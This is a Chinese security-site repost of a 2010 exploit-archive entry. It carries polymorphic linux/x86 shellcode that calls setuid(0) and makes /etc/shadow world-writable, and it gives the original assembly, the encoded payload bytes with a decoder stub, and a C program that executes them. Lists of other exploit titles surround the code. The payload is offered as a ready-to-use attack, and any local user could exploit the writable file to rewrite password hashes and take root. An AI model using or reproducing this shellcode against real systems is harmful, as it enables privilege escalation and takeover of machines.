首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
linux/x86 Shellcode Polymorphic - setuid(0) + chmod("/etc/shadow", 0666) Shellco
来源:vfocus.net 作者:antrhacks 发布时间:2010-06-01  


=============================================================================================
 linux/x86 Shellcode Polymorphic - setuid(0) + chmod("/etc/shadow", 0666) Shellcode 61 Bytes 
=============================================================================================

/*
 * Title: linux/x86 Shellcode Polymorphic - setuid(0) + chmod("/etc/shadow", 0666) Shellcode 61 Bytes 
 * Encode  : _ADD
 * Author: antrhacks
 * Platform: Linux X86
*/

/* 0riginAl ASSembly
 31 db                 xor    %ebx,%ebx
 b0 17                 mov    $0x17,%al
 cd 80                 int    $0x80
 31 c0                 xor    %eax,%eax
 50                    push   %eax
 68 61 64 6f 77        push   $0x776f6461
 68 63 2f 73 68        push   $0x68732f63
 68 2f 2f 65 74        push   $0x74652f2f
 89 e3                 mov    %esp,%ebx
 66 b9 b6 01           mov    $0x1b6,%cx
 b0 0f                 mov    $0xf,%al
 cd 80                 int    $0x80
 40                    inc    %eax
 cd 80                 int    $0x80
*/


#include "stdio.h"

char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x37\x80\x6c\x0e\xff\x13"
"\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\x44\xee\xc3\x2a\xe0\x93\x44\xd3\x63\x7b\x74\x77\x82\x8a\x7b\x76\x42\x86\x7b\x7b\x42\x42\x78\x87\x9c"
"\xf6\x79\xcc\xc9\x14\xc3\x22\xe0\x93\x53\xe0\x93";

int main()
{
        printf(" [*] Polymorphic Shellcode - length: %d\n",strlen(shellcode));
        (*(void(*)()) shellcode)();

        return 0;
}

 

 

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mediacoder v0.7.3.4672 SEH Exp
·change mode 0777 of "/etc/shad
·ZipExplorer 7.0 (.zar) DoS
·11 bytes sys_kill(-1,9) x86 li
·GoAheaad Webserver Source Code
·linux/x86 sys_execve("/bin/sh"
·linux/x86 sys_execve("/usr/bin
·change mode 0777 of "/etc/pass
·linux/x86 sys_sethostname("PwN
·41 bytes sys_rmdir("/tmp/willd
·linux/x86 cdrom ejecting shell
·38 bytes sys_mkdir("/tmp/dir",
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved